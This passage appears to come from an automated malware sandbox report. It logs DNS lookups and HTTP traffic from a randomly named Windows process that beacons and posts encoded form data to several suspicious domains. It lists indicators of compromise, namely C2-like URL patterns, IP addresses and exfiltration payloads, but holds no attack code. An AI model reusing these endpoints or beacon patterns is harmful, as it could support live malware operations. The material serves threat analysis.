Jul 27, 2024 11:40:59.833646059 CEST	80	49725	38.47.158.215	192.168.2.10
Jul 27, 2024 11:41:00.653422117 CEST	80	49725	38.47.158.215	192.168.2.10
Jul 27, 2024 11:41:00.653706074 CEST	80	49725	38.47.158.215	192.168.2.10
Jul 27, 2024 11:41:00.657073975 CEST	49725	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:41:00.659836054 CEST	49725	80	192.168.2.10	38.47.158.215
Jul 27, 2024 11:41:00.664761066 CEST	80	49725	38.47.158.215	192.168.2.10
Jul 27, 2024 11:41:05.690543890 CEST	49726	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:05.695569992 CEST	80	49726	3.33.130.190	192.168.2.10
Jul 27, 2024 11:41:05.695645094 CEST	49726	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:05.697407007 CEST	49726	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:05.702275991 CEST	80	49726	3.33.130.190	192.168.2.10
Jul 27, 2024 11:41:06.189397097 CEST	80	49726	3.33.130.190	192.168.2.10
Jul 27, 2024 11:41:06.189486980 CEST	49726	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:07.999830961 CEST	49726	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:08.007194042 CEST	80	49726	3.33.130.190	192.168.2.10
Jul 27, 2024 11:41:09.018198967 CEST	49727	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:09.025609016 CEST	80	49727	3.33.130.190	192.168.2.10
Jul 27, 2024 11:41:09.025856972 CEST	49727	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:09.028253078 CEST	49727	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:09.035393000 CEST	80	49727	3.33.130.190	192.168.2.10
Jul 27, 2024 11:41:09.490418911 CEST	80	49727	3.33.130.190	192.168.2.10
Jul 27, 2024 11:41:09.490500927 CEST	49727	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:10.531023979 CEST	49727	80	192.168.2.10	3.33.130.190
Jul 27, 2024 11:41:10.535954952 CEST	80	49727	3.33.130.190	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 11:39:02.190541983 CEST	49858	53	192.168.2.10	1.1.1.1
Jul 27, 2024 11:39:02.230828047 CEST	53	49858	1.1.1.1	192.168.2.10
Jul 27, 2024 11:40:00.044889927 CEST	60629	53	192.168.2.10	1.1.1.1
Jul 27, 2024 11:40:00.694561958 CEST	53	60629	1.1.1.1	192.168.2.10
Jul 27, 2024 11:40:16.580943108 CEST	64892	53	192.168.2.10	1.1.1.1
Jul 27, 2024 11:40:16.594754934 CEST	53	64892	1.1.1.1	192.168.2.10
Jul 27, 2024 11:40:24.659359932 CEST	56359	53	192.168.2.10	1.1.1.1
Jul 27, 2024 11:40:24.677839994 CEST	53	56359	1.1.1.1	192.168.2.10
Jul 27, 2024 11:40:37.786868095 CEST	62917	53	192.168.2.10	1.1.1.1
Jul 27, 2024 11:40:38.127974033 CEST	53	62917	1.1.1.1	192.168.2.10
Jul 27, 2024 11:40:51.425040960 CEST	49917	53	192.168.2.10	1.1.1.1
Jul 27, 2024 11:40:52.221852064 CEST	53	49917	1.1.1.1	192.168.2.10
Jul 27, 2024 11:41:05.674897909 CEST	57587	53	192.168.2.10	1.1.1.1
Jul 27, 2024 11:41:05.688205004 CEST	53	57587	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 27, 2024 11:39:02.190541983 CEST	192.168.2.10	1.1.1.1	0x16db	Standard query (0)	investdirectinsurance.com	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:00.044889927 CEST	192.168.2.10	1.1.1.1	0xe183	Standard query (0)	www.jl884.vip	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:16.580943108 CEST	192.168.2.10	1.1.1.1	0x20a3	Standard query (0)	www.cloudsoda.xyz	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:24.659359932 CEST	192.168.2.10	1.1.1.1	0x8cd2	Standard query (0)	www.d99qtpkvavjj.xyz	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:37.786868095 CEST	192.168.2.10	1.1.1.1	0x5940	Standard query (0)	www.firmshow.top	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:51.425040960 CEST	192.168.2.10	1.1.1.1	0xc513	Standard query (0)	www.jl800.vip	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:41:05.674897909 CEST	192.168.2.10	1.1.1.1	0x5532	Standard query (0)	www.theridleysuk.co.uk	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 27, 2024 11:39:02.230828047 CEST	1.1.1.1	192.168.2.10	0x16db	No error (0)	investdirectinsurance.com		172.67.189.102	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:39:02.230828047 CEST	1.1.1.1	192.168.2.10	0x16db	No error (0)	investdirectinsurance.com		104.21.65.79	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:00.694561958 CEST	1.1.1.1	192.168.2.10	0xe183	No error (0)	www.jl884.vip	e6375a47.jl884.vip.cname.scname.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:40:00.694561958 CEST	1.1.1.1	192.168.2.10	0xe183	No error (0)	e6375a47.jl884.vip.cname.scname.com		38.47.158.160	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:00.694561958 CEST	1.1.1.1	192.168.2.10	0xe183	No error (0)	e6375a47.jl884.vip.cname.scname.com		65.181.132.158	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:16.594754934 CEST	1.1.1.1	192.168.2.10	0x20a3	Name error (3)	www.cloudsoda.xyz	none	none	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:24.677839994 CEST	1.1.1.1	192.168.2.10	0x8cd2	No error (0)	www.d99qtpkvavjj.xyz	d99qtpkvavjj.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:40:24.677839994 CEST	1.1.1.1	192.168.2.10	0x8cd2	No error (0)	d99qtpkvavjj.xyz		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:24.677839994 CEST	1.1.1.1	192.168.2.10	0x8cd2	No error (0)	d99qtpkvavjj.xyz		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:38.127974033 CEST	1.1.1.1	192.168.2.10	0x5940	No error (0)	www.firmshow.top		203.161.43.228	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:52.221852064 CEST	1.1.1.1	192.168.2.10	0xc513	No error (0)	www.jl800.vip	8418a72e.jl800.vip.cname.scname.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:40:52.221852064 CEST	1.1.1.1	192.168.2.10	0xc513	No error (0)	8418a72e.jl800.vip.cname.scname.com		38.47.158.215	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:40:52.221852064 CEST	1.1.1.1	192.168.2.10	0xc513	No error (0)	8418a72e.jl800.vip.cname.scname.com		65.181.132.188	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:41:05.688205004 CEST	1.1.1.1	192.168.2.10	0x5532	No error (0)	www.theridleysuk.co.uk	theridleysuk.co.uk		CNAME (Canonical name)	IN (0x0001)	false
Jul 27, 2024 11:41:05.688205004 CEST	1.1.1.1	192.168.2.10	0x5532	No error (0)	theridleysuk.co.uk		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 27, 2024 11:41:05.688205004 CEST	1.1.1.1	192.168.2.10	0x5532	No error (0)	theridleysuk.co.uk		15.197.148.33	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

investdirectinsurance.com

www.jl884.vip

www.d99qtpkvavjj.xyz

www.firmshow.top

www.jl800.vip

www.theridleysuk.co.uk

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49713	38.47.158.160	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:00.707182884 CEST	459	OUT	GET /r4wk/?odlXV=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOJebRDbzl2T1aaRGoo2pz4PsH3zqV1w==&3rb=9LUll6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.jl884.vip User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Jul 27, 2024 11:40:01.487265110 CEST	790	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 09:40:01 GMT Content-Type: application/json;charset=utf8; Content-Length: 62 Connection: close Set-Cookie: http_waf_cookie=f490ec0e-81c6-40a61644aabef2853ccef03de80c8b699fd7; Expires=1722080401; Path=/; HttpOnly Set-Cookie: acw_tc=ac11000117220732013433921e0088c093ba5d42b5a1203e63c59e67ae6e7e;path=/;HttpOnly;Max-Age=1800 jckl: Lb1kl6WIzeYkeesMNMIgH7nIcIbVmtnsFRXtvKegg0Db/YwE8Ay0DBjZklrJrHWC55YvwTknl6bPrwFCkJvniA== x-content-type-options: nosniff x-xss-protection: 1 strict-transport-security: max-age=63072000; includeSubdomains; preload Via: 1.1 google, 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 X-Request-Id: d02cf970f08b59d8d673aa9566050b89 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d Data Ascii: {"status": "6001","msg": "fail","result":""}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49714	3.33.130.190	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:24.687130928 CEST	740	OUT	POST /r4rr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 194 Host: www.d99qtpkvavjj.xyz Origin: http://www.d99qtpkvavjj.xyz Referer: http://www.d99qtpkvavjj.xyz/r4rr/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 6a 69 4b 51 66 70 77 2f 35 30 62 70 69 43 69 6a 59 37 5a 43 33 39 44 59 46 76 55 44 77 4c 4a 50 37 4a 64 4b 77 4a 71 70 4f 70 50 77 59 64 71 67 32 62 52 57 53 36 54 5a 5a 48 4e 6d 48 48 74 70 4a 67 4e 44 79 77 5a 36 34 4b 57 53 54 66 66 6e 4e 35 53 49 32 61 6d 67 57 59 67 66 46 69 4f 48 34 66 6b 67 44 52 50 76 73 74 68 38 55 69 4b 71 6b 69 6d 56 33 36 32 46 4b 52 42 4f 65 48 58 79 46 59 53 63 62 45 6d 54 78 65 78 67 5a 75 6e 49 76 2f 43 4d 7a 51 61 54 48 68 58 48 37 6c 34 6f 78 50 68 70 4b 6b 42 2f 70 68 66 6b 61 4c 6d 4c Data Ascii: odlXV=C3FIcjbM8hgqjiKQfpw/50bpiCijY7ZC39DYFvUDwLJP7JdKwJqpOpPwYdqg2bRWS6TZZHNmHHtpJgNDywZ64KWSTffnN5SI2amgWYgfFiOH4fkgDRPvsth8UiKqkimV362FKRBOeHXyFYScbEmTxexgZunIv/CMzQaTHhXH7l4oxPhpKkB/phfkaLmL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49715	3.33.130.190	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:27.229099989 CEST	764	OUT	POST /r4rr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 218 Host: www.d99qtpkvavjj.xyz Origin: http://www.d99qtpkvavjj.xyz Referer: http://www.d99qtpkvavjj.xyz/r4rr/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 78 79 57 51 64 4b 59 2f 2f 55 62 71 73 69 69 6a 4b 37 5a 4f 33 39 2f 59 46 71 34 54 6c 6f 74 50 37 6f 74 4b 69 39 2b 70 4e 70 50 77 54 39 71 70 79 62 52 52 53 36 65 6d 5a 48 42 6d 48 48 35 70 4a 68 52 44 79 48 74 35 34 61 57 51 65 2f 66 68 4a 35 53 49 32 61 6d 67 57 59 45 78 46 69 57 48 34 72 59 67 45 45 6a 75 69 4e 68 2f 54 69 4b 71 32 53 6d 52 33 36 32 37 4b 52 78 6f 65 42 54 79 46 59 69 63 62 52 4b 51 71 75 78 75 64 75 6d 37 6d 64 47 47 35 41 6d 49 49 67 58 37 70 54 77 49 32 75 41 75 62 31 67 6f 36 57 44 71 55 4e 54 68 34 62 78 6b 55 50 6b 4c 49 31 38 38 43 2b 69 61 53 42 31 63 42 41 3d 3d Data Ascii: odlXV=C3FIcjbM8hgqxyWQdKY//UbqsiijK7ZO39/YFq4TlotP7otKi9+pNpPwT9qpybRRS6emZHBmHH5pJhRDyHt54aWQe/fhJ5SI2amgWYExFiWH4rYgEEjuiNh/TiKq2SmR3627KRxoeBTyFYicbRKQquxudum7mdGG5AmIIgX7pTwI2uAub1go6WDqUNTh4bxkUPkLI188C+iaSB1cBA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49716	3.33.130.190	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:29.760888100 CEST	1777	OUT	POST /r4rr/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1230 Host: www.d99qtpkvavjj.xyz Origin: http://www.d99qtpkvavjj.xyz Referer: http://www.d99qtpkvavjj.xyz/r4rr/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 78 79 57 51 64 4b 59 2f 2f 55 62 71 73 69 69 6a 4b 37 5a 4f 33 39 2f 59 46 71 34 54 6c 6f 6c 50 38 61 6c 4b 7a 73 2b 70 4d 70 50 77 4e 4e 71 6b 79 62 51 55 53 36 48 76 5a 48 63 62 48 46 42 70 4a 44 31 44 30 79 42 35 7a 61 57 51 42 76 66 67 4e 35 53 64 32 61 32 38 57 59 30 78 46 69 57 48 34 71 49 67 58 78 50 75 67 4e 68 38 55 69 4b 63 6b 69 6e 32 33 36 4f 4e 4b 51 46 6e 65 53 62 79 4c 63 47 63 59 6a 79 51 33 65 78 73 51 4f 6d 6a 6d 63 37 63 35 44 43 71 49 67 6a 56 70 55 55 49 30 61 74 46 50 78 67 77 76 6d 44 71 61 62 44 55 38 2b 68 2f 5a 63 31 35 50 6e 6f 2f 58 4e 44 53 59 52 63 34 64 76 59 4d 4a 72 71 78 54 59 63 6c 5a 74 45 35 79 49 4f 55 30 67 49 78 36 76 51 4e 58 63 63 63 45 63 42 41 31 55 49 43 64 2b 67 2f 2b 65 6e 34 57 53 4c 6c 32 30 58 57 54 70 47 56 70 6b 74 45 78 56 74 54 46 78 53 79 36 50 45 6b 32 4b 77 2b 45 38 62 6f 44 52 35 6b 6b 6a 38 4e 6f 6b 48 41 65 6c 4f 6c 62 42 54 44 2f 73 76 62 67 33 72 47 39 6b 30 64 32 69 37 7a 62 77 76 4d [TRUNCATED] Data Ascii: odlXV=C3FIcjbM8hgqxyWQdKY//UbqsiijK7ZO39/YFq4TlolP8alKzs+pMpPwNNqkybQUS6HvZHcbHFBpJD1D0yB5zaWQBvfgN5Sd2a28WY0xFiWH4qIgXxPugNh8UiKckin236ONKQFneSbyLcGcYjyQ3exsQOmjmc7c5DCqIgjVpUUI0atFPxgwvmDqabDU8+h/Zc15Pno/XNDSYRc4dvYMJrqxTYclZtE5yIOU0gIx6vQNXcccEcBA1UICd+g/+en4WSLl20XWTpGVpktExVtTFxSy6PEk2Kw+E8boDR5kkj8NokHAelOlbBTD/svbg3rG9k0d2i7zbwvMzO5WfqjsgU6h/4RQPKKLBl/LeBTtJy9ZJIJFyQ0TsmWNU2xcNd+gstSX0Q4yf+Ik6ShSqVc1BWsAsM5IpAuI8qGUFezAwrck9xziO0TSBcQ2QRM6+XKc9GjlvQ358wIyH9RXINfK2xfA5PMp/mnbtjGLJpLTCRSC7/g8UtPThhDYQE03rABLMxUoy+SU+kpoKPE4k+qL7TNflsui2uKXHls+pUiIhQSYNM68ua0Kou7LGtxwAjJGXxNUnhl0PtWH+Je1twgm4e0Ig7U89dZnuCKP7lS45CRw7myAD+H06LnvS5BZ9OtBL1Gopo/rNhPv9NyPK5o+rzE44yvgMUZrzRkDd/oKcJ9rDKjA/uxDkO7aDGDG8HFXMlOQGnexJoQE6L3k/7OQrTTLN5PfhNAfoj5lV5AP0jsiplDutN4FRFO+B1hrziJpJVntTHA3lT1Xaef5n4PZkUzxB2U/WKbD107FkqQf1nV6MPvVd7HHg/MmWPtJusHsQMSaX2mAguVCN5EV4+QmzZPza8xaDlpqHrMTw9Na2mbcH3qoOi/3//cHGwGmx2lHsIk4VK0l9EJZVX+Zb34BLPoK/x1yr6BHxk7Oznph8W/MdYe0SHJlsz6xx6QANyWFGCFwmFZa04xsnS44Z+lp6X7rSdp97roiacsUT6SCbin5kL [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49717	3.33.130.190	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:32.291311026 CEST	466	OUT	GET /r4rr/?odlXV=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljkp3kSKvDFIaS2JqmarYyLC+gwYZSBQ==&3rb=9LUll6 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.d99qtpkvavjj.xyz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Jul 27, 2024 11:40:32.768960953 CEST	388	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 27 Jul 2024 09:40:32 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 64 6c 58 56 3d 50 31 74 6f 66 56 58 74 79 31 34 30 78 42 53 56 50 70 49 57 37 67 79 69 72 56 76 62 62 71 34 5a 6d 74 76 52 4d 66 51 33 76 49 4e 70 39 37 55 2b 6a 50 65 4b 4f 70 62 4e 66 2f 7a 68 78 70 42 65 55 59 54 61 46 31 63 62 59 31 64 79 4a 77 4a 55 7a 68 6c 6a 6b 70 33 6b 53 4b 76 44 46 49 61 53 32 4a 71 6d 61 72 59 79 4c 43 2b 67 77 59 5a 53 42 51 3d 3d 26 33 72 62 3d 39 4c 55 6c 6c 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?odlXV=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljkp3kSKvDFIaS2JqmarYyLC+gwYZSBQ==&3rb=9LUll6"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49718	203.161.43.228	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:38.192493916 CEST	728	OUT	POST /02nb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 194 Host: www.firmshow.top Origin: http://www.firmshow.top Referer: http://www.firmshow.top/02nb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 34 52 75 38 64 6e 31 4e 2b 44 46 7a 47 4a 53 35 52 30 2b 4c 56 39 46 6f 33 74 6b 6e 51 37 39 61 44 34 35 72 61 45 4a 65 6f 4f 64 4e 6b 6c 6a 33 4d 6d 33 67 74 43 73 58 61 63 64 75 57 2b 49 30 63 55 36 33 45 73 2f 2f 46 4f 77 6e 63 4d 4f 74 31 66 4d 30 50 69 45 76 53 65 2f 6e 55 67 59 58 31 71 54 41 6e 46 66 31 43 31 38 79 4d 5a 53 75 61 32 70 44 31 38 41 48 4e 78 4a 4b 43 41 72 77 63 59 54 38 6b 7a 58 41 33 53 6e 2b 63 68 46 2b 50 47 70 43 75 34 58 46 72 32 52 30 78 4a 70 42 71 54 57 68 61 79 37 48 61 74 63 33 4d 64 4f 79 Data Ascii: odlXV=9CkU3kfti4H24Ru8dn1N+DFzGJS5R0+LV9Fo3tknQ79aD45raEJeoOdNklj3Mm3gtCsXacduW+I0cU63Es//FOwncMOt1fM0PiEvSe/nUgYX1qTAnFf1C18yMZSua2pD18AHNxJKCArwcYT8kzXA3Sn+chF+PGpCu4XFr2R0xJpBqTWhay7Hatc3MdOy
Jul 27, 2024 11:40:38.802273035 CEST	658	IN	HTTP/1.1 404 Not Found Date: Sat, 27 Jul 2024 09:40:38 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49719	203.161.43.228	80	5904	C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 11:40:40.741687059 CEST	752	OUT	POST /02nb/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 218 Host: www.firmshow.top Origin: http://www.firmshow.top Referer: http://www.firmshow.top/02nb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 Data Raw: 6f 64 6c 58 56 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 70 41 65 38 63 48 4a 4e 2f 6a 46 38 4a 70 53 35 62 55 2b 50 56 39 42 6f 33 76 4a 71 51 75 74 61 44 61 78 72 62 47 68 65 6c 75 64 4e 38 56 6a 79 42 47 32 73 74 43 6f 70 61 64 68 75 57 39 30 30 63 57 79 33 44 66 6e 38 66 2b 77 6c 55 73 4f 76 37 2f 4d 30 50 69 45 76 53 65 72 5a 55 67 51 58 32 62 6a 41 6e 68 44 32 42 31 39 41 4c 5a 53 75 4c 47 70 48 31 38 41 6c 4e 77 55 76 43 43 54 77 63 5a 50 38 6c 69 58 48 39 53 6e 34 53 42 45 72 48 6b 77 49 73 49 54 4f 6d 57 31 34 78 76 4e 58 74 79 33 6d 4c 6a 61 51 4a 61 41 35 43 62 37 59 66 31 7a 4f 2f 6b 4f 6d 47 77 2f 51 69 38 4a 42 39 51 69 5a 56 67 3d 3d Data Ascii: odlXV=9CkU3kfti4H2pAe8cHJN/jF8JpS5bU+PV9Bo3vJqQutaDaxrbGheludN8VjyBG2stCopadhuW900cWy3Dfn8f+wlUsOv7/M0PiEvSerZUgQX2bjAnhD2B19ALZSuLGpH18AlNwUvCCTwcZP8liXH9Sn4SBErHkwIsITOmW14xvNXty3mLjaQJaA5Cb7Yf1zO/kOmGw/Qi8JB9QiZVg==
